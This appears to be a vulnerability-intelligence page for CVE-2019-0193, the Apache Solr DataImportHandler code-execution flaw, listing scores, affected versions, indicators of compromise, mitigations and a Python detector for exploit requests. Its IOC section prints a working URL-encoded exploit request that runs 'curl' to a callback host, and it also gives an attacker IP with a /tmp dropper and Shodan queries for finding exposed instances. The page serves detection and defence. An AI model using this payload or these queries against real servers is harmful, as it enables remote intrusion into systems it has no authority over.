CVE-2019-0193
published 2019-08-01


Priority: P1 (85, high)
CVSS 3.1: 7.2, vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, Exploit; Initial access
CISA Known Exploited Vulnerability, due 2022-06-10
Exploited in the wild
EPSS: 83.55% (99.6th percentile)
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

Affected

6 ranges

Vendor  | Product      | Version range                                    | Fixed in
apache  | apache_solr  |                                                  |
apache  | solr         | < 7.7.3                                          | 7.7.3
apache  | solr         | >= 8.1.0 < 8.1.2                                 | 8.1.2
debian  | debian_linux |                                                  |
debian  | debian_linux |                                                  |
debian  | lucene-solr  | < lucene-solr 3.6.2+dfsg-22 (bookworm)           | lucene-solr 3.6.2+dfsg-22 (bookworm)

Detection & IOCs (extracted from sources)

url: /solr/admin/cores?wt=json
url: /solr/{{core}}/dataimport?indent=on&wt=json
command: command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
ip: 194.87.252.159
  • Exploit POST requests target the /solr/<core>/dataimport endpoint with Content-Type: application/x-www-form-urlencoded and the X-Requested-With: XMLHttpRequest header; the body contains debug=true and a dataConfig parameter embedding a <script> block with Java Runtime.exec() calls.
  • Exploitation is confirmed by an outbound HTTP interaction (e.g., curl callback) originating from the Solr Java process; monitor for unexpected outbound HTTP/DNS from the Solr JVM process.
  • Shodan/FOFA queries can identify exposed Solr instances: search for http.title:"apache solr", http.title:"solr admin", title="solr admin", or intitle:"apache solr" to find potentially vulnerable targets.
  • In post-exploitation (Kinsing campaign), the attacker's initial runtime command was executed under the Java process of Apache Solr; alert on child process spawning (e.g., curl, sh, wget) from the Solr JVM.
  • Kinsing post-exploitation drops a shell script to /tmp/zzz fetched from 194.87.252[.]159; monitor for curl/wget writing to /tmp with subsequent execution.
  • The vulnerability is only exploitable when the DIH module is enabled and the dataConfig request parameter is accepted; starting with Solr 8.2.0, the Java System property 'enable.dih.dataConfigParam' must be explicitly set to true for the parameter to be accepted.
  • As a mitigation short of patching, solrconfig.xml can be edited to configure all DataImportHandler usages with an 'invariants' section listing the 'dataConfig' parameter set to an empty string, or network controls can restrict access to the DataImportHandler endpoint.
  • The Nuclei template uses an OAST/interactsh callback to confirm exploitation; passive/blind detection requires an out-of-band interaction channel and will not fire on network-isolated Solr instances.
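The two defensive checks described in the bullets above (the request pattern to alert on, and the solrconfig.xml 'invariants' mitigation) as one added Python example. This is illustration code written for this page, not a Solr project tool or the source's own detection rule; the request records and the solrconfig.xml fragment it scans are constructed for the example, and the inline script in the sample body is a harmless placeholder rather than the payload quoted above.

```python
"""Defensive checks for CVE-2019-0193 (Solr DataImportHandler dataConfig).

1. classify_dih_request(): flag POSTs to /solr/<core>/dataimport whose body
   carries a dataConfig parameter, with the highest severity when debug=true
   and the config embeds a <script> block (the exploitation pattern).
2. audit_solrconfig(): parse a solrconfig.xml and list DataImportHandler
   handlers that do not pin dataConfig to an empty string via 'invariants'.
All sample data below is constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Matches the DIH endpoint of any core; a trailing query string is allowed.
DIH_PATH = re.compile(r"^/solr/[^/]+/dataimport")


def classify_dih_request(method, path, body):
    """Return 'exploit-pattern', 'dataconfig-in-request', or None."""
    if method.upper() != "POST" or not DIH_PATH.match(path):
        return None
    # parse_qs URL-decodes the form body (application/x-www-form-urlencoded).
    params = parse_qs(body, keep_blank_values=True)
    data_config = params.get("dataConfig", [None])[0]
    if data_config is None:
        return None
    debug = params.get("debug", [""])[0].lower() == "true"
    if debug and re.search(r"<script\b", data_config, re.I):
        return "exploit-pattern"
    # Any request-supplied DIH config is worth a lower-severity alert.
    return "dataconfig-in-request"


# Constructed request records: (method, path, body)
SAMPLE_REQUESTS = [
    ("GET", "/solr/admin/cores?wt=json", ""),
    ("POST", "/solr/mycore/dataimport", "command=full-import&clean=false&commit=true"),
    ("POST", "/solr/mycore/dataimport?indent=on&wt=json",
     "command=full-import&debug=true&dataConfig=%3CdataConfig%3E%3Cscript%3E"
     "%3C!%5BCDATA%5Bfunction+f(row)%7Breturn+row%3B%7D%5D%5D%3E%3C%2Fscript%3E"
     "%3C%2FdataConfig%3E"),
    ("POST", "/solr/mycore/dataimport", "command=full-import&dataConfig=%3CdataConfig%2F%3E"),
]


def audit_solrconfig(xml_text):
    """Return names of DataImportHandler requestHandlers lacking the invariant."""
    root = ET.fromstring(xml_text)
    unprotected = []
    for handler in root.iter("requestHandler"):
        if not handler.get("class", "").endswith("DataImportHandler"):
            continue
        pinned = False
        for lst in handler.findall("lst"):
            if lst.get("name") != "invariants":
                continue
            for entry in lst.findall("str"):
                # An empty invariant overrides any dataConfig sent by the client.
                if entry.get("name") == "dataConfig" and not (entry.text or "").strip():
                    pinned = True
        if not pinned:
            unprotected.append(handler.get("name"))
    return unprotected


# Constructed solrconfig.xml: one unprotected handler, one with the mitigation.
SAMPLE_SOLRCONFIG = """<config>
  <requestHandler name="/dataimport" class="solr.DataImportHandler">
    <lst name="defaults"><str name="config">data-config.xml</str></lst>
  </requestHandler>
  <requestHandler name="/dataimport-hardened" class="solr.DataImportHandler">
    <lst name="defaults"><str name="config">data-config.xml</str></lst>
    <lst name="invariants"><str name="dataConfig"></str></lst>
  </requestHandler>
  <requestHandler name="/select" class="solr.SearchHandler"/>
</config>
"""

if __name__ == "__main__":
    for method, path, body in SAMPLE_REQUESTS:
        print(f"{method} {path} -> {classify_dih_request(method, path, body)}")
    print("handlers missing dataConfig invariant:", audit_solrconfig(SAMPLE_SOLRCONFIG))
```

The request classifier is meant to run over access logs or a WAF's decoded request bodies; the config audit is a one-shot check to run against each core's solrconfig.xml after applying the 'invariants' mitigation, since a single handler left without it re-opens the parameter.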

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 7.2   | HIGH     | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd           | v2.0    | 9.0   | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C
osv           |         | 7.2   | HIGH     |
vulncheck     |         | 7.2   | HIGH     |
cisa          |         | 7.2   | HIGH     |
vendor_debian |         | 7.2   | LOW      |
vendor_redhat |         | 7.2   | HIGH     |